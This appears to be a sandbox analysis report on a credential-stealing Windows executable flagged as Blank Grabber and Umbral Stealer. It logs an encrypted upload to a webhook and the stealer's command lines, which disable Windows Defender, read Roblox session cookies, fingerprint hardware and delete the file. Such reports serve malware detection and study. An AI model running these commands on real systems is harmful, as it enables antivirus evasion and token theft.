                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 7d 16 7d 76 dd 52 83 b7 40 32 18 63 cd de bb 11 6d 95 5a 5e 60 3a 71 2a bc d1 90 79 ad 5c b0 ea f0 6a e1 f8 59 78 1c d5 3c 43 08 09 10 52 45 1f ec ca 0a ca 12 0d bf 3b b4 b9 59 64 16 29 1b 32 db dc c9 a6 cd 21 99 ab 74 62 49 f5 a7 d5 91 c3 dd ef 89 bb 95 eb af 36 ba 1b 11 89 da ab d3 88 19 ca c2 0d f5 a7 c3 39 e1 fe 72 e0 dd 60 c6 22 4b 51 2c b8 97 78 de cb 59 8c ad b4 10 c0 f1 cb ba 22 8f d0 1f 48 94 7e 8b ca f7 1a 77 18 76 3a 59 bf 8f 27 f0 0c f6 3b 9c 94 3e fa 6b 47 59 f7 52 af e6 cd 68 57 ed df 8b 7c ae d1 68 44 78 a1 c5 15 17 01 dc 0c b7 26 87 97 f4 4a 99 b8 b8 7e 4f f6 e3 49 03 66 ea 41 8e e6 e2 3f d3 8f 12 17 d2 54 e4 c1 7b 01 b9 ac 5a a7 32 02 33 70 bd e7 39 79 08 11 64 5a 5f 34 a1 ac 1b 59 a1 d5 c8 3c 0d 65 b4 ba 66 c3 9a 9f 19 30 69 6a 9f 57 2b
                                                Data Ascii: }}vR@2cmZ^`:q*y\jYx<CRE;Yd)2!tbI69r`"KQ,xY"H~wv:Y';>kGYRhW|hDx&J~OIfA?T{Z23p9ydZ_4Y<ef0ijW+
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: fd 57 83 ab f2 52 cc f0 6d 9e 80 e0 7b d5 4f f5 74 37 55 65 6f ce f1 8f 4e 6c 90 4f b5 dc 7c 0b ac 87 28 a5 35 f3 02 97 cb 7c f1 e4 fe 63 c9 73 ec bb df 63 6b 53 0c c5 1a 42 5c bb b7 2c af 3e 57 03 9c d3 f0 8d cc fb 3f e1 f8 64 97 3b e5 11 70 d1 7b 12 46 07 20 de 9a 7b cf 66 f4 84 21 f2 c7 c4 f1 2b 41 64 c3 07 2f 64 19 df cf cb 21 c1 a2 c2 90 69 1f dd b1 ac 1a 67 70 f0 8c 9c d5 07 95 e7 6a bb 6e 0b f3 eb b5 80 9f 49 ff a0 26 e0 8b 4a 6a 79 56 01 33 7d cd 92 df 30 ed 56 8b f7 72 1d a6 62 ca c0 dd ee 96 80 26 6b d5 1c b9 97 11 bb 5d 0a 2e 82 bc 52 39 3d 47 bd 3c 70 c1 b8 90 16 d6 97 93 89 6b 7b 23 00 61 f4 98 3c 90 2b 1c f8 65 e2 c3 e5 c7 ec be fb 2f a7 10 a0 54 ee 05 88 21 77 fd b8 9c 75 3f 12 1e 6d dd a2 cf 9f 22 76 9f 1b 88 41 c5 1d fd 4d fe a2 51 5d c6
                                                Data Ascii: WRm{Ot7UeoNlO|(5|csckSB\,>W?d;p{F {f!+Ad/d!igpjnI&JjyV3}0Vrb&k].R9=G<pk{#a<+e/T!wu?m"vAMQ]
                                                2024-08-05 13:44:51 UTC16355OUTData Raw: 96 90 e5 2f a7 45 ac ea ad 44 6d 1a fd ee ce 4d e6 2b 7a 40 d9 a6 71 c9 3e 6d e3 00 c8 34 ef e9 ac 99 5a e3 56 0b 7a 78 66 44 11 5f 09 77 4e a2 40 d0 49 e4 c0 e8 3a e5 1d ec 8f 57 0f e5 8b 76 df a4 7a c2 91 07 b8 e3 9d 22 f3 97 28 7b 94 67 94 10 89 61 9f 77 f4 5a 66 23 93 6c 2a 12 76 de 0e 74 61 80 78 d8 0a 66 cb 29 2a 79 f1 a0 34 48 2a 47 d2 34 9e f2 23 40 c9 1f a8 d0 8d c2 12 81 66 99 ff 6a 5f 1d 0a c8 43 26 11 77 d5 a3 01 07 2c a6 e8 d8 0a 28 e7 6f 25 9e b1 95 85 d9 4c a2 27 2f 15 93 5b d7 50 18 d1 38 98 d6 3d e0 d2 bc cc 93 89 dd ef ea 00 0b 43 4d 28 08 bd 2b 1b cc e9 28 f7 a9 3a 7c fc cd 47 bb 38 9e ca 24 03 98 0f 09 d5 80 de 80 97 69 2a e5 26 c1 db 4e 82 84 90 35 6e 8f 2c fb d6 77 bc f2 85 71 4d 47 f3 71 c6 3b f3 f7 61 73 d9 3f ca 1d 91 5f a1 b7 fa
                                                Data Ascii: /EDmM+z@q>m4ZVzxfD_wN@I:Wvz"({gawZf#l*vtaxf)*y4H*G4#@fj_C&w,(o%L'/[P8=CM(+(:|G8$i*&N5n,wqMGq;as?_
                                                2024-08-05 13:44:52 UTC967INHTTP/1.1 404 Not Found
                                                Date: Mon, 05 Aug 2024 13:44:52 GMT
                                                Content-Type: application/json
                                                Content-Length: 45
                                                Connection: close
                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                x-ratelimit-limit: 5
                                                x-ratelimit-remaining: 4
                                                x-ratelimit-reset: 1722865493
                                                x-ratelimit-reset-after: 1
                                                via: 1.1 google
                                                alt-svc: h3=":443"; ma=86400
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNW9pdtjvblLioLWZUfboMySiwBFgHK6dpv%2FHooofDFjLL8AKn2Af75Xn3f%2BjAbBvlW98v7%2FLlnH228kDCKSOr3cAjA%2B6wckKePXKI49EnuBYKvG4GsWJbunFkGQ6o40EQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                X-Content-Type-Options: nosniff
                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                Server: cloudflare
                                                CF-RAY: 8ae739693891c470-EWR
                                                {"message": "Unknown Webhook", "code": 10015}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:09:43:45
                                                Start date:05/08/2024
                                                Path:C:\Users\user\Desktop\zamPeEkHWr.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\zamPeEkHWr.exe"
                                                Imagebase:0x1eaae570000
                                                File size:232'448 bytes
                                                MD5 hash:EF323A7483653FFB1FC4FF036576E065
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1668669145.000001EAAE572000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2336242686.000001EAB073D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2336242686.000001EAB06A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:1
                                                Start time:09:43:47
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" csproduct get uuid
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:09:43:47
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\attrib.exe
                                                Wow64 process (32bit):false
                                                Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"
                                                Imagebase:0x7ff65a860000
                                                File size:23'040 bytes
                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\zamPeEkHWr.exe'
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:09:43:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:09:43:51
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff693ab0000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:09:43:55
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:09:43:55
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:09:43:58
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:09:43:58
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:09:44:09
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:09:44:09
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" os get Caption
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:09:44:26
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic.exe" csproduct get uuid
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:23
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:24
                                                Start time:09:44:28
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:25
                                                Start time:09:44:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:"wmic" path win32_VideoController get name
                                                Imagebase:0x7ff6f1fe0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:26
                                                Start time:09:44:48
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:27
                                                Start time:09:44:50
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                                                Imagebase:0x7ff7474c0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:28
                                                Start time:09:44:50
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:29
                                                Start time:09:44:51
                                                Start date:05/08/2024
                                                Path:C:\Windows\System32\PING.EXE
                                                Wow64 process (32bit):false
                                                Commandline:ping localhost
                                                Imagebase:0x7ff7ef520000
                                                File size:22'528 bytes
                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:10.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:4
                                                  Total number of Limit Nodes:0
                                                  execution_graph 49062 7ffd9ba336ae 49063 7ffd9ba336ca 49062->49063 49064 7ffd9ba337c7 CryptUnprotectData 49063->49064 49065 7ffd9ba33843 49064->49065

                                                  Executed Functions

                                                  Function 00007FFD9BA305F5 Relevance: 2.2, Strings: 1, Instructions: 972COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7ffd9ba305f5-7ffd9ba30658 2 7ffd9ba3065f-7ffd9ba30660 0->2 3 7ffd9ba3065a-7ffd9ba3065d 0->3 4 7ffd9ba30663-7ffd9ba30686 2->4 3->4 6 7ffd9ba30693-7ffd9ba3069a 4->6 7 7ffd9ba30688-7ffd9ba30691 4->7 8 7ffd9ba3069d-7ffd9ba306a0 6->8 7->8 9 7ffd9ba306df-7ffd9ba30705 8->9 10 7ffd9ba306a2-7ffd9ba306ad 8->10 18 7ffd9ba30707-7ffd9ba30717 9->18 19 7ffd9ba30729-7ffd9ba3074a 9->19 12 7ffd9ba306af-7ffd9ba306c6 10->12 13 7ffd9ba306cd-7ffd9ba306cf 10->13 12->13 13->9 15 7ffd9ba306d1-7ffd9ba306d8 13->15 15->9 18->19 22 7ffd9ba30719-7ffd9ba30727 18->22 23 7ffd9ba30750-7ffd9ba30778 19->23 24 7ffd9ba308ad-7ffd9ba308b8 19->24 22->19 37 7ffd9ba3077e-7ffd9ba307a8 23->37 38 7ffd9ba308a2-7ffd9ba308a7 23->38 27 7ffd9ba308d6-7ffd9ba308e7 24->27 28 7ffd9ba308ba-7ffd9ba308cf 24->28 45 7ffd9ba308ee-7ffd9ba30901 27->45 31 7ffd9ba308d1-7ffd9ba308d4 28->31 32 7ffd9ba3086b-7ffd9ba3086c 28->32 31->27 35 7ffd9ba3086e-7ffd9ba3088a 32->35 36 7ffd9ba3088c-7ffd9ba3088d 32->36 35->36 35->38 39 7ffd9ba3088f-7ffd9ba3089a 36->39 37->38 55 7ffd9ba307ae-7ffd9ba307cc 37->55 38->23 38->24 41 7ffd9ba308a0 39->41 42 7ffd9ba30816-7ffd9ba3081b 39->42 41->45 46 7ffd9ba30821-7ffd9ba30843 42->46 47 7ffd9ba30902-7ffd9ba30915 42->47 46->47 54 7ffd9ba30849-7ffd9ba3086a 46->54 51 7ffd9ba3091f-7ffd9ba30940 47->51 52 7ffd9ba30917-7ffd9ba3091e 47->52 56 7ffd9ba3097e-7ffd9ba30981 51->56 57 7ffd9ba30942-7ffd9ba3094e 51->57 52->51 54->32 71 7ffd9ba307ef-7ffd9ba30808 55->71 72 7ffd9ba307ce-7ffd9ba307ed 55->72 60 7ffd9ba30983-7ffd9ba3098f 56->60 61 7ffd9ba3099b-7ffd9ba309a9 56->61 57->56 58 7ffd9ba30950-7ffd9ba30951 57->58 65 7ffd9ba30959-7ffd9ba3097b 58->65 60->61 63 7ffd9ba30991-7ffd9ba3099a 60->63 67 7ffd9ba309af-7ffd9ba309c3 61->67 68 7ffd9ba30af1-7ffd9ba30c8a 61->68 65->56 103 7ffd9ba30c95-7ffd9ba30d05 call 7ffd9ba30930 68->103 104 7ffd9ba30c8c-7ffd9ba30c8f 68->104 79 7ffd9ba3080e-7ffd9ba30814 71->79 72->79 79->39 128 7ffd9ba30d07-7ffd9ba30d26 103->128 129 7ffd9ba30d2b-7ffd9ba30d45 103->129 104->103 105 7ffd9ba30dad-7ffd9ba30e13 call 7ffd9ba30930 104->105 124 7ffd9ba30e15-7ffd9ba30e34 105->124 125 7ffd9ba30e39-7ffd9ba30e40 105->125 142 7ffd9ba30ed2-7ffd9ba30ee3 124->142 130 7ffd9ba30e6f-7ffd9ba30e72 125->130 131 7ffd9ba30e42-7ffd9ba30e6d 125->131 128->142 148 7ffd9ba30d47-7ffd9ba30d75 129->148 149 7ffd9ba30d7a-7ffd9ba30da8 129->149 132 7ffd9ba30ea4-7ffd9ba30eaf 130->132 133 7ffd9ba30e74-7ffd9ba30ea2 130->133 131->142 140 7ffd9ba30eb1-7ffd9ba30ec6 132->140 141 7ffd9ba30ec7-7ffd9ba30ecb 132->141 133->142 140->141 141->142 148->142 149->142
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H
                                                  • API String ID: 0-2852464175
                                                  • Opcode ID: afa6281173bc795f9dd10dfc987e94982a2a963a0a0b022d72ed1ae815d94ca4
                                                  • Instruction ID: 7a193e85a2154ec8867a8c573896e30283e276d9e631609a8be8d991a1e3df53
                                                  • Opcode Fuzzy Hash: afa6281173bc795f9dd10dfc987e94982a2a963a0a0b022d72ed1ae815d94ca4
                                                  • Instruction Fuzzy Hash: 1062E631B0EB894FE766DB289875A787BE1EF56710B0A01FAD449C71F3EE58AC418341
                                                  Function 00007FFD9BA3300D Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 158 7ffd9ba3300d-7ffd9ba33019 159 7ffd9ba3301b 158->159 160 7ffd9ba3301c-7ffd9ba3308c 158->160 159->160 165 7ffd9ba3308e-7ffd9ba330a0 160->165 166 7ffd9ba330a1-7ffd9ba3314c 160->166 165->166 179 7ffd9ba3314e-7ffd9ba33161 166->179 180 7ffd9ba33164-7ffd9ba337c0 166->180 179->180 190 7ffd9ba337c7-7ffd9ba33841 CryptUnprotectData 180->190 191 7ffd9ba33843 190->191 192 7ffd9ba33849-7ffd9ba33878 190->192 191->192
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2395412044.00007FFD9BA30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9ba30000_zamPeEkHWr.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b95ab447879792919f69fba64b731258ce147bbe4a1e704fb3318be390bb3e25
                                                  • Instruction ID: f826a768c6ea3066398dc1ec21d58761aef9585b4d866b863b7f8db7a46a92f2
                                                  • Opcode Fuzzy Hash: b95ab447879792919f69fba64b731258ce147bbe4a1e704fb3318be390bb3e25
                                                  • Instruction Fuzzy Hash: 10A11A6290FBC51FEB66876858151A57FE1FF96320B0940BFE0C8871B7E5A8AD05C382
                                                  Function 00007FFD9BA3C391 Relevance: 1.8, Strings: 1, Instructions: 543COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
